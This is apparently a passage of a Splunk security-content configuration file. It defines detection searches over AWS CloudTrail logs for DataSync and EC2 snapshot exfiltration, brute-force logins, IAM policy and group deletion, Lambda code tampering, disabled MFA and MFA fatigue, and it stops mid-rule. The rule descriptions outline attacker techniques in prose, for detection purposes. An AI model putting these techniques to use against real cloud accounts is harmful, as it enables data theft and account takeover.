"mitre_attack": ["T1119"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search looks for potential misuse of an AWS service known as DataSync. This AWS service is used to transfer data between different AWS cloud storage services, such as Amazon S3, Amazon EFS, and Amazon FSx for Windows File Server. Attackers can create a task in AWS to periodically copy data from a private AWS location to a public location resulting in the compromise of the data. action.notable.param.rule_title = AWS Exfiltration via DataSync Task action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName = CreateTask eventSource="datasync.amazonaws.com" | rename requestParameters.* as * | stats count min(_time) as firstTime max(_time) as lastTime by src_ip aws_account_id awsRegion eventName destinationLocationArn sourceLocationArn userAgent user_arn userIdentity.principalId errorCode | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_exfiltration_via_datasync_task_filter` [ESCU - AWS Exfiltration via EC2 Snapshot - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a series of AWS API calls, made in a short time window, related to EC2 snapshots that can detect a potential exfiltration via EC2 Snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances followed by modifying snapshot attributes such that it can be shared externally. Once this is done, the attacker can then load that EC2 snapshot and access all the sensitive information. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search detects a series of AWS API calls, made in a short time window, related to EC2 snapshots that can detect a potential exfiltration via EC2 Snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances followed by modifying snapshot attributes such that it can be shared externally. Once this is done, the attacker can then load that EC2 snapshot and access all the sensitive information. action.escu.how_to_implement = You must install splunk AWS add on and Splunk App for AWS. This search works with AWS CloudTrail logs. We have intentionally removed `guardduty.amazonaws.com` from src_ip to remove false positives caused by guard duty. We recommend you adjust the time window as per your environment. action.escu.known_false_positives = It is possible that an AWS admin has legitimately shared a snapshot with an other account for a specific purpose. Please check any recent change requests filed in your organization. action.escu.creation_date = 2023-03-22 action.escu.modification_date = 2023-03-22 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Exfiltration via EC2 Snapshot - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"] action.risk = 1 action.risk.param._risk_message = Potential AWS EC2 Exfiltration detected on account id - $aws_account_id$ by user $userName$ from src_ip $src_ip$ action.risk.param._risk = [{"risk_object_field": "userName", "risk_object_type": "other", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Exfiltration via EC2 Snapshot - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a series of AWS API calls, made in a short time window, related to EC2 snapshots that can detect a potential exfiltration via EC2 Snapshot modifications. In this attack, the attacker typically proceeds by listing and creating EC2 snapshots of the available EC2 instances followed by modifying snapshot attributes such that it can be shared externally. Once this is done, the attacker can then load that EC2 snapshot and access all the sensitive information. action.notable.param.rule_title = AWS Exfiltration via EC2 Snapshot action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName IN ("CreateSnapshot", "DescribeSnapshotAttribute", "ModifySnapshotAttribute", "DeleteSnapshot") src_ip !="guardduty.amazonaws.com" | bin _time span=5m | stats count dc(eventName) as distinct_api_calls values(eventName) values(requestParameters.attributeType) as attributeType values(requestParameters.createVolumePermission.add.items{}.userId) as aws_account_id_added values(userAgent) as userAgent by _time userName src_ip aws_account_id | where distinct_api_calls >= 2 | `aws_exfiltration_via_ec2_snapshot_filter` [ESCU - AWS High Number Of Failed Authentications For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an AWS account with more than 20 failed authentication events in the span of 5 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an AWS account with more than 20 failed authentication events in the span of 5 minutes. This behavior could represent a brute force attack against the account. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.how_to_implement = You must install Splunk AWS Add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = A user with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-01-27 action.escu.modification_date = 2023-01-27 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS High Number Of Failed Authentications For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Compromised User Account", "AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ failed to authenticate more than 20 times in the span of 5 minutes for AWS Account $aws_account_id$ action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "other", "risk_score": 35}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS High Number Of Failed Authentications For User - Rule action.correlationsearch.annotations = {"analytic_story": ["Compromised User Account", "AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 70, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(_raw) AS failed_attempts values(src_ip) as src_ip values(user_agent) by _time, user_name, eventName, eventSource aws_account_id | where failed_attempts > 20 | `aws_high_number_of_failed_authentications_for_user_filter` [ESCU - AWS High Number Of Failed Authentications From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an IP address failing to authenticate 20 or more times to the AWS Web Console in the span of 5 minutes. This behavior could represent a brute force attack against an AWS tenant to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an IP address failing to authenticate 20 or more times to the AWS Web Console in the span of 5 minutes. This behavior could represent a brute force attack against an AWS tenant to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection. action.escu.how_to_implement = You must install Splunk Add-on for AWS in order to ingest Cloudtrail. We recommend the users to try different combinations of the bucket span time and the tried account threshold to tune this search according to their environment. action.escu.known_false_positives = An Ip address with more than 20 failed authentication attempts in the span of 5 minutes may also be triggered by a broken application. action.escu.creation_date = 2023-01-30 action.escu.modification_date = 2023-01-30 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS High Number Of Failed Authentications From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = Multiple failed console login attempts against users $tried_accounts$ seen from $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS High Number Of Failed Authentications From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(user_name) as tried_accounts values(user_agent) by _time, src_ip, eventName, eventSource aws_account_id | where failed_attempts > 20 | `aws_high_number_of_failed_authentications_from_ip_filter` [ESCU - AWS IAM AccessDenied Discovery Events - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies excessive AccessDenied events within an hour timeframe. It is possible that an access key to AWS may have been stolen and is being misused to perform discovery events. In these instances, the access is not available with the key stolen therefore these events will be generated. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifies excessive AccessDenied events within an hour timeframe. It is possible that an access key to AWS may have been stolen and is being misused to perform discovery events. In these instances, the access is not available with the key stolen therefore these events will be generated. action.escu.how_to_implement = The Splunk AWS Add-on and Splunk App for AWS is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = It is possible to start this detection will need to be tuned by source IP or user. In addition, change the count values to an upper threshold to restrict false positives. action.escu.creation_date = 2021-11-12 action.escu.modification_date = 2021-11-12 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM AccessDenied Discovery Events - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud User Activities"] action.risk = 1 action.risk.param._risk_message = User $userIdentity.arn$ is seen to perform excessive number of discovery related api calls- $failures$, within an hour where the access was denied. action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "userIdentity.arn", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM AccessDenied Discovery Events - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (errorCode = "AccessDenied") user_type=IAMUser (userAgent!=*.amazonaws.com) | bucket _time span=1h | stats count as failures min(_time) as firstTime max(_time) as lastTime, dc(eventName) as methods, dc(eventSource) as sources by src_ip, userIdentity.arn, _time | where failures >= 5 and methods >= 1 and sources >= 1 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_accessdenied_discovery_events_filter` [ESCU - AWS IAM Assume Role Policy Brute Force - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. Meaning, when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580", "T1110"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. Meaning, when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing. action.escu.how_to_implement = The Splunk AWS Add-on and Splunk App for AWS is required to utilize this data. The search requires AWS Cloudtrail logs. Set the `where count` greater than a value to identify suspicious activity in your environment. action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilties. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. action.escu.creation_date = 2021-04-01 action.escu.modification_date = 2021-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM Assume Role Policy Brute Force - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has caused multiple failures with errorCode $errorCode$, which potentially means adversary is attempting to identify a role name. action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 28}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM Assume Role Policy Brute Force - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 70, "impact": 40, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1580", "T1110"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following detection identifies any malformed policy document exceptions with a status of `failure`. A malformed policy document exception occurs in instances where roles are attempted to be assumed, or brute forced. In a brute force attempt, using a tool like CloudSploit or Pacu, an attempt will look like `arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS`. Meaning, when an adversary is attempting to identify a role name, multiple failures will occur. This detection focuses on the errors of a remote attempt that is failing. action.notable.param.rule_title = AWS IAM Assume Role Policy Brute Force action.notable.param.security_domain = access action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (errorCode=MalformedPolicyDocumentException) status=failure (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyName) as policy_name by src eventName eventSource aws_account_id errorCode requestParameters.policyDocument userAgent eventID awsRegion userIdentity.principalId user_arn | where count >= 2 | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_assume_role_policy_brute_force_filter` [ESCU - AWS IAM Delete Policy - Rule] action.escu = 0 action.escu.enabled = 1 description = The following detection identifies when a policy is deleted on AWS. This does not identify whether successful or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy , DetachGroupPolicy , or DetachRolePolicy. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following detection identifies when a policy is deleted on AWS. This does not identify whether successful or failed, but the error messages tell a story of suspicious attempts. There is a specific process to follow when deleting a policy. First, detach the policy from all users, groups, and roles that the policy is attached to, using DetachUserPolicy , DetachGroupPolicy , or DetachRolePolicy. action.escu.how_to_implement = The Splunk AWS Add-on and Splunk App for AWS is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilties. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete policies (least privilege). In addition, this may be saved seperately and tuned for failed or success attempts only. action.escu.creation_date = 2021-04-01 action.escu.modification_date = 2021-04-01 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM Delete Policy - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM Delete Policy - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeletePolicy (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policyArn by src user_arn eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_delete_policy_filter` [ESCU - AWS IAM Failure Group Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection identifies failure attempts to delete groups. We want to identify when a group is attempting to be deleted, but either access is denied, there is a conflict or there is no group. This is indicative of administrators performing an action, but also could be suspicious behavior occurring. Review parallel IAM events - recently added users, new groups and so forth. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This detection identifies failure attempts to delete groups. We want to identify when a group is attempting to be deleted, but either access is denied, there is a conflict or there is no group. This is indicative of administrators performing an action, but also could be suspicious behavior occurring. Review parallel IAM events - recently added users, new groups and so forth. action.escu.how_to_implement = The Splunk AWS Add-on and Splunk App for AWS is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilties. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete groups (least privilege). action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM Failure Group Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has had mulitple failures while attempting to delete groups from $src$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM Failure Group Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=iam.amazonaws.com eventName=DeleteGroup errorCode IN (NoSuchEntityException,DeleteConflictException, AccessDenied) (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.groupName) as group_name by src eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_failure_group_deletion_filter` [ESCU - AWS IAM Successful Group Deletion - Rule] action.escu = 0 action.escu.enabled = 1 description = The following query uses IAM events to track the success of a group being deleted on AWS. This is typically not indicative of malicious behavior, but a precurser to additional events thay may unfold. Review parallel IAM events - recently added users, new groups and so forth. Inversely, review failed attempts in a similar manner. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1069.003", "T1098", "T1069"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following query uses IAM events to track the success of a group being deleted on AWS. This is typically not indicative of malicious behavior, but a precurser to additional events thay may unfold. Review parallel IAM events - recently added users, new groups and so forth. Inversely, review failed attempts in a similar manner. action.escu.how_to_implement = The Splunk AWS Add-on and Splunk App for AWS is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilties. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete groups (least privilege). action.escu.creation_date = 2021-03-31 action.escu.modification_date = 2021-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM Successful Group Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM Successful Group Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1069.003", "T1098", "T1069"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=iam.amazonaws.com eventName=DeleteGroup errorCode=success (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.groupName) as group_deleted by src eventName eventSource errorCode user_agent awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_successful_group_deletion_filter` [ESCU - AWS Lambda UpdateFunctionCode - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to detect IAM users attempting to update/modify AWS lambda code via the AWS CLI to gain persistence, futher access into your AWS environment and to facilitate planting backdoors. In this instance, an attacker may upload malicious code/binary to a lambda function which will be executed automatically when the funnction is triggered. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to detect IAM users attempting to update/modify AWS lambda code via the AWS CLI to gain persistence, futher access into your AWS environment and to facilitate planting backdoors. In this instance, an attacker may upload malicious code/binary to a lambda function which will be executed automatically when the funnction is triggered. action.escu.how_to_implement = You must install Splunk AWS Add on and enable Cloudtrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin or an autorized IAM user has updated the lambda fuction code legitimately. action.escu.creation_date = 2022-02-24 action.escu.modification_date = 2022-02-24 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Lambda UpdateFunctionCode - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud User Activities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Lambda UpdateFunctionCode - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=lambda.amazonaws.com eventName=UpdateFunctionCode* errorCode = success user_type=IAMUser | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.functionName) as function_updated by src_ip user_arn user_agent user_type eventName aws_account_id |`aws_lambda_updatefunctioncode_filter` [ESCU - AWS Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = AWS Administrators may disable MFA but it is highly unlikely for this event to occur without prior notice to the company action.escu.creation_date = 2022-10-04 action.escu.modification_date = 2022-10-04 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ has disabled Multi-Factor authentication for AWS account $aws_account_id$ action.risk.param._risk = [{"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = AWS Multi-Factor Authentication Disabled action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName= DeleteVirtualMFADevice OR eventName=DeactivateMFADevice) | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id userAgent eventID awsRegion user_name userIdentity.arn status | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_multi_factor_authentication_disabled_filter` [ESCU - AWS Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests to an AWS Console for a single user. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. AWS Environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests to an AWS 